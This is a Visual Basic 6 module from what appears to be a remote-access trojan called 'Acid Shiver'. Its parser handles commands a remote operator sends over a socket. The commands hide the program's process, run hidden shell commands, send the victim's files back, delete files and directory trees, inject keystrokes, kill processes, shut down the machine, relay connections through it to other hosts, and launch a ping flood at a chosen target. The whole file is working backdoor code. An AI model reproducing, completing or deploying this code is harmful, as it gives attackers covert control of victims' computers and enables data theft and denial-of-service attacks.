Attribute VB_Name = "modCore"

'This module handles the command line stuff..

Sub ParseCommandLine(Index As Integer, stInput As String)

With Hidden.Sock(Index)
  
  
  On Error GoTo ErrHand
    
    'Debugging Only - Log all commands to desktop
    
    If DEBUG_MODE = True Then
    
    Dim FFile As Integer
    FFile = FreeFile
    Open GetWinDir & "\desktop\log.txt" For Append As FFile
    Print #FFile, stInput
    Close #FFile
    
    End If
    
    
    
    
    stInput = RTrim(stInput)
    Dim inCounter As Integer
    Dim inFoundPos As Integer
    Dim PARSECHAR As String
    Dim ARG(1 To 25) As String
    Dim CMD As String
    Dim argCounter As Integer
    Dim Ret As Variant
    Dim intPhat As Integer
    Dim strPhat As String
    Dim CTimer As Long
    Dim strcm As String
    
    stInput = TrimCharacter(stInput, Chr(13))
    stInput = TrimCharacter(stInput, Chr(10))

    PARSECHAR = " "

    argCounter = 0

    intPhat = InStr(1, stInput, " ")
    strPhat = Mid(stInput, intPhat, Len(stInput) - (intPhat - 1))

    If Len(stInput) = 0 Then
        .SendData vbCrLf
        Exit Sub
    End If


    inCounter = 1


    inFoundPos = InStr(inCounter, stInput, PARSECHAR)

    If inFoundPos = 0 Then
        CMD = UCase$(stInput)
        GoTo NOPARAM
    End If


    While inFoundPos <> 0

      If argCounter = 0 Then

        CMD = Mid$(stInput, inCounter, inFoundPos - inCounter)

      Else

        ARG(argCounter) = Mid$(stInput, inCounter, inFoundPos - inCounter)

      End If

      argCounter = argCounter + 1
      inCounter = inFoundPos + 1
      inFoundPos = InStr(inCounter, stInput, PARSECHAR)
    Wend


    If inCounter < Len(stInput) Then
        ARG(argCounter) = Mid$(stInput, inCounter)
    End If



NOPARAM:

CMD = (UCase$(CMD))



strPhat = Trim(strPhat)

Select Case CMD
 
Case "HIDE"
    .SendData vbCrLf
    Call RegService(Val("&H" & Trim(strPhat)), True)
    
Case "SHOW"
    .SendData vbCrLf
    Call RegService(Val("&H" & Trim(strPhat)), False)

Case "NETSTAT"
    .SendData vbCrLf & vbCrLf
    .SendData strPhat & "Loading Network Status..." & vbCrLf & vbCrLf
    .SendData ShellGetText(Index, "NETSTAT -ARES")
    .SendData vbCrLf & vbCrLf
Case "ATTRIB"
Case "LOF"
    strPhat = Trim(strPhat)
    .SendData vbCrLf & vbCrLf
    If Len(Dir(strPhat)) > 1 Then
        .SendData strPhat & " is " & ansFCyan & FileLen(strPhat) & ansFWhite & " bytes long."
    Else
            .SendData strPhat & " was not found."
    End If
    .SendData vbCrLf & vbCrLf
Case "COPY"
    ARG(1) = Trim(ARG(1))
    ARG(2) = Trim(ARG(2))
    
    FileCopy ARG(1), ARG(2)
    .SendData vbCrLf

Case "CP"
    ARG(1) = Trim(ARG(1))
    ARG(2) = Trim(ARG(2))
    
    FileCopy ARG(1), ARG(2)
    .SendData vbCrLf
    
Case "MKDIR"
    strPhat = (Trim(strPhat))
    MkDir strPhat
    .SendData vbCrLf
Case "RMDIR"
    strPhat = (Trim(strPhat))
    .SendData vbCrLf & vbCrLf
    RmTree Index, strPhat
    .SendData vbCrLf & vbCrLf
Case "HELP"
    Call ShowHelp(Index, strPhat)
Case "SH"
    .SendData vbCrLf & vbCrLf & "Output: " & vbCrLf & vbCrLf & ShellGetText(Index, strPhat) & vbCrLf & vbCrLf
Case "CLS"
    .SendData ansClear
Case "PORT"
    strPhat = (Trim$(strPhat))
    Hidden.Listen.Close
    Hidden.Listen.LocalPort = Val(strPhat)
    Hidden.Listen.Listen
    .SendData vbCrLf & vbCrLf & "New Port Specified:   " & Hidden.Listen.LocalPort & vbCrLf & vbCrLf
    
Case "KILL"
    strPhat = UCase$(Trim(strPhat))
    If Val("&H " & strPhat) = 0 Then
    .SendData vbCrLf & vbCrLf & "Not a Valid Process ID" & vbCrLf & vbCrLf
    Else
    .SendData vbCrLf & vbCrLf & KillProcess(strPhat) & vbCrLf & vbCrLf
    End If
    
Case "DESK"
    ChDir (GetWinDir & "\" & "DESKTOP" & "\")
    
    .SendData vbCrLf & vbCrLf & "Changing to Desktop" & vbCrLf & vbCrLf
Case "RECENT"
    ChDir$ (GetWinDir & "\" & "RECENT" & "\")
    .SendData vbCrLf & vbCrLf & "Changing to Recent" & vbCrLf & vbCrLf
Case "WSFTP"
    ChDir ("C:\Program Files\WS_FTP\")
    .SendData vbCrLf & vbCrLf & "Trying to jump to WS_FTP directory" & vbCrLf & vbCrLf

Case "VERSION"
    .SendData vbCrLf & vbCrLf & SUBJ & App.Major & "." & App.Minor & "." & App.Revision & vbCrLf & vbCrLf
Case "BOUNCE"
    OldData(Index) = ""
    If Val(Trim(ARG(2))) = 0 Or Len(TrimSpaces(ARG(1))) = 0 Then
        .SendData vbCrLf & vbCrLf & "Usage:  Bounce <host> <port>." & vbCrLf & vbCrLf
    Else
        Load Hidden.Bnc(Index)
        With Hidden.Bnc(Index)
            .Close
            .LocalPort = 0
            .RemoteHost = Trim(ARG(1))
            .RemotePort = Val(Trim(ARG(2)))
            .Connect
        End With
        .SendData vbCrLf & vbCrLf & "Attempting Bounce..."

        CTimer = Timer
        Do While CTimer + 30 > Timer
            If Asc(LastSockData(Index)) = 3 Then
                .SendData " Connection Aborted." & vbCrLf
                GoTo Skipout
            End If

            DoEvents
            If Hidden.Bnc(Index).State = sckConnected Then GoTo GotBounce
        Loop
        .SendData "Timed Out..." & vbCrLf & vbCrLf
        GoTo Skipout
GotBounce:
        BounceMode(Index) = True
        Exit Sub
    End If
Case "DRIVES"
    .SendData vbCrLf & vbCrLf & LDrives & vbCrLf & vbCrLf

Case "S"
    SendKeys strPhat & vbCrLf
    .SendData vbCrLf & vbCrLf & "Sendkeys: " & strPhat & vbCrLf & vbCrLf

Case "MACADDR"
    .SendData vbCrLf & vbCrLf & "Netbios Information:  " & vbCrLf & GetMacAddr & vbCrLf & vbCrLf
Case "NAME"

    If strPhat = "" Then
        .SendData vbCrLf & vbCrLf & "You must enter a new name for the computer!" & vbCrLf & vbCrLf
        GoTo Skipout
    End If

    Ret = SetComputerName(strPhat)


    .SendData vbCrLf & vbCrLf & "Computer has been renamed " & strPhat & "." & vbCrLf & vbCrLf
Case "PS"
   .SendData vbCrLf & PS & vbCrLf
Case "ENV"
    Dim Env As String
    Dim X As Integer
    X = 1
    Env = Environ(X)
    .SendData vbCrLf & vbCrLf & "Listing DOS Environment Variables:" & vbCrLf & vbCrLf
       Do Until Env = ""
               Env = Environ(X)
               .SendData vbCrLf & Env
               X = X + 1
       Loop
    .SendData vbCrLf & vbCrLf

Case "BEEP"
    If Val(strPhat) = 0 Then strPhat = 1
    .SendData vbCrLf & vbCrLf & "Beeping " & Val(ARG(1)) & " Time(s)." & vbCrLf & vbCrLf
    For D = 1 To Val(strPhat)
        Beep
        DoEvents
    Next D

    

Case "CDROM"
    Dim returnstring
    Select Case UCase(strPhat)

    Case "OPEN"
        CDR.DoorOpen
        .SendData vbCrLf & vbCrLf & "CD-ROM Door Opened." & vbCrLf & vbCrLf
    Case "CLOSE"
        CDR.DoorClose
         .SendData vbCrLf & vbCrLf & "CD-ROM Door Closed." & vbCrLf & vbCrLf
    Case "PLAY"
        CDR.PlayCD
        .SendData vbCrLf & vbCrLf & "CD-ROM Playing." & vbCrLf & vbCrLf
    Case "AUDIO ON"
        CDR.AudioOn
        .SendData vbCrLf & vbCrLf & "CD-ROM Audio ON." & vbCrLf & vbCrLf
    Case "AUDIO OFF"
        CDR.AudioOff
        .SendData vbCrLf & vbCrLf & "CD-ROM Audio OFF." & vbCrLf & vbCrLf
    Case "STATUS"
        .SendData vbCrLf & vbCrLf & "CD-ROM Status:  " & CDR.Status & vbCrLf & vbCrLf
    Case "INFO"
        .SendData vbCrLf & vbCrLf & "CD-ROM Information:  " & CDR.Info & vbCrLf & vbCrLf
    Case "TRACKS"
        .SendData vbCrLf & vbCrLf & "CD-ROM Tracks:  " & CDR.NumOfTracks & vbCrLf & vbCrLf
    Case "PRESENT"
        .SendData vbCrLf & vbCrLf & "CD-ROM Present:  " & CDR.MediaPresent & vbCrLf & vbCrLf
        
    Case Else
        .SendData vbCrLf & vbCrLf & "CD-ROM COMMANDS" & vbCrLf & vbCrLf
        .SendData "CDROM OPEN - Open CD Door" & vbCrLf
        .SendData "CDROM CLOSE - Close CD Door" & vbCrLf
        .SendData "CDROM PLAY - Play CD in drive" & vbCrLf
        .SendData "CDROM AUDIO ON - Turn CD Audio on" & vbCrLf
        .SendData "CDROM AUDIO OFF - Turn CD Audio off" & vbCrLf
        .SendData "CDROM STATUS - Get CD-ROM Status" & vbCrLf
        .SendData "CDROM INFO - Get CD-ROM Info" & vbCrLf
        .SendData "CDROM TRACKS - Get Number of Tracks" & vbCrLf
        .SendData "CDROM PRESENT - Show if CD is present" & vbCrLf & vbCrLf
    End Select
Case "DIE"
    .SendData ansClear & "Shutting Down Acid Shiver..." & vbCrLf
    Pause 1
    Close
    Unload Hidden
    Set Hidden = Nothing
    End
    
Case "LABEL"
    ARG(1) = Trim(ARG(1))
    ARG(2) = Trim(ARG(2))

    Ret = ChangeVolumeLabel(ARG(1), ARG(2))
    If Ret = 1 Then
        .SendData vbCrLf & vbCrLf & "Volume " & ARG(1) & " renamed to " & ARG(2) & "." & vbCrLf & vbCrLf
    Else
        .SendData vbCrLf & vbCrLf & "Volume Rename Failed." & vbCrLf & "Example:  Label C:\ LSD_OWNZ" & vbCrLf & vbCrLf
    End If
Case "SHUTDOWN"

    If Val(strPhat) = 0 And Not strPhat = "0" Then
        .SendData vbCrLf & vbCrLf & "Windows Shutdown Failed." & vbCrLf & "Shutdown 0 = Logoff" & vbCrLf & "Shutdown 1 = Exit Windows" & vbCrLf & "Shutdown 2 = Reboot" & vbCrLf & "Shutdown 4 = Force Shutdown" & vbCrLf & vbCrLf
        GoTo Skipout
    End If

    Ret = ShutDown(Val(strPhat))
    If Ret = True Then
        .SendData vbCrLf & vbCrLf & "Windows Shutdown Code " & ARG(1) & " Successful." & vbCrLf & vbCrLf
    Else
        .SendData vbCrLf & vbCrLf & "Windows Shutdown Failed." & vbCrLf & "Shutdown 0 = Logoff" & vbCrLf & "Shutdown 1 = Exit Windows" & vbCrLf & "Shutdown 2 = Reboot" & vbCrLf & "Shutdown 4 = Force Shutdown" & vbCrLf & vbCrLf
    End If
Case "DRIVE"
strPhat = UCase$(Left(strPhat, 1))
    If strPhat = "" Then
        .SendData vbCrLf & vbCrLf & "Specify a Drive Letter to Check." & vbCrLf & "Example:  DRIVE C:" & vbCrLf & vbCrLf
        GoTo Skipout
    End If


    Call VolumeInfo(Index, strPhat)
    Ret = Drive_Type(strPhat & ":\")

    strcm = "Drive "
    
    Select Case Ret
  
    Case 0
        .SendData vbCrLf & strcm & strPhat & " is of an unknown type." & vbCrLf & vbCrLf
    Case 1
        .SendData vbCrLf & strcm & strPhat & " is not present." & vbCrLf & vbCrLf
    Case 2
        .SendData vbCrLf & strcm & strPhat & " is removable (floppy disk or zip drive)." & vbCrLf & vbCrLf
    Case 3
        .SendData vbCrLf & strcm & strPhat & " is fixed (hard strcmor non-removable zip drive)." & vbCrLf & vbCrLf
    Case 4
        .SendData vbCrLf & strcm & strPhat & " is remote (network drive)" & vbCrLf & vbCrLf
    Case 5
        .SendData vbCrLf & strcm & strPhat & " is a CD-ROM drive." & vbCrLf & vbCrLf
    Case 6
        .SendData vbCrLf & strcm & strPhat & " is a RAMDISK." & vbCrLf & vbCrLf
    Case Else
        .SendData vbCrLf & "Something went wrong..." & vbCrLf & vbCrLf
    End Select
Case "KS"
    Hidden.Sock(Val(Trim(strPhat))).Close
    Hidden.Sock(Val(Trim(strPhat))).LocalPort = 0
    .SendData vbCrLf & vbCrLf & "Socket " & ansFCyan & Val(Trim(strPhat)) & ansFWhite & " Closed." & vbCrLf & vbCrLf
Case "DIR"
     
     .SendData ListDirectory(strPhat)
     
Case "LS"
     
     .SendData ListDirectory(strPhat)
     
Case "DEL"
    .SendData DeleteFile(strPhat)
Case "CD"
    Call cmdCD(Index, strPhat)
Case "TIME"
    .SendData vbCrLf & vbCrLf & "   [" & Time & "] " & vbCrLf & vbCrLf
Case "DATE"
    .SendData vbCrLf & vbCrLf & "   [" & Date & "] " & vbCrLf & vbCrLf

Case "INFO"
    .SendData vbCrLf & CD & ">   <User and Computer Information>" & vbCrLf & UserInfo(False) & vbCrLf

Case "STATUS"
    .SendData vbCrLf & CD & ">   <Current Status>" & vbCrLf
    .SendData vbCrLf
    .SendData "Total Connections:     " & ansFCyan & LastSock & ansFWhite & vbCrLf
    .SendData String(80, "_") & vbCrLf
    .SendData vbCrLf
    Dim SocketStat

    For SocketStat = 0 To LastSock - 1
        .SendData String(80, "_") & vbCrLf
        .SendData "Socket Number   : " & ansFCyan & SocketStat & ansFWhite & vbCrLf
        
     
        
        strcm = "Socket State    : "
        Select Case Hidden.Sock(SocketStat).State

        Case sckClosed
            .SendData strcm & "Closed" & vbCrLf
        Case sckOpen
            .SendData strcm & "Open" & vbCrLf
        Case sckListening
            .SendData strcm & "Listening" & vbCrLf
        Case sckConnectionPending
            .SendData strcm & "Connection Pending" & vbCrLf
        Case sckResolvingHost
            .SendData strcm & "Resolving Host" & vbCrLf
        Case sckHostResolved
            .SendData strcm & "Host Resolved" & vbCrLf
        Case sckConnecting
            .SendData strcm & "Connecting" & vbCrLf
        Case sckConnected
            .SendData strcm & "Connected" & vbCrLf
        Case sckClosing
            .SendData strcm & "Closing" & vbCrLf
        Case sckError
            .SendData strcm & "Socket Error" & vbCrLf

        End Select

        .SendData "Server Stats    : " & Hidden.Sock(SocketStat).LocalIP & ":" & Hidden.Sock(SocketStat).LocalPort & vbCrLf
        .SendData "Client Stats    : " & Hidden.Sock(SocketStat).RemoteHostIP & ":" & Hidden.Sock(SocketStat).RemotePort & vbCrLf

    Next SocketStat
    .SendData String(80, "_") & vbCrLf & vbCrLf
Case "PING"
    If strPhat = "" Then GoTo Skipout
    D = Shell(GetWinDir & "\Ping -n 1000 -l 65510 -w 1 " & ARG(1), vbHide)
    .SendData vbCrLf & CD & "->   Pinging " & ARG(1) & "... " & vbCrLf
Case "GET"

    Call SendFile(Index, strPhat, False)
Case "CAT"
    Call SendFile(Index, strPhat, False)
Case "BCAT"
    Call SendFile(Index, strPhat, True)
Case "BGET"
    Call SendFile(Index, strPhat, True)
Case "CMD"
    If strPhat = "" Then GoTo Skipout
    Shell strPhat, vbHide
    .SendData vbCrLf & vbCrLf & "Command Launched: -->  " & ansFYellow & strPhat & ansFWhite & vbCrLf & vbCrLf
Case Else
    .SendData vbCrLf

End Select

Skipout:

.SendData CD & ">"

End With

Exit Sub

ErrHand:
If Err.Number = 5 Then
    Err.Clear
    Resume Next
End If

Hidden.Sock(Index).SendData vbCrLf & vbCrLf & ansFRed & "Error " & Err.Number & " : " & ansFCyan & Err.Description & ansFWhite & vbCrLf
Err.Clear
Resume Next


End Sub

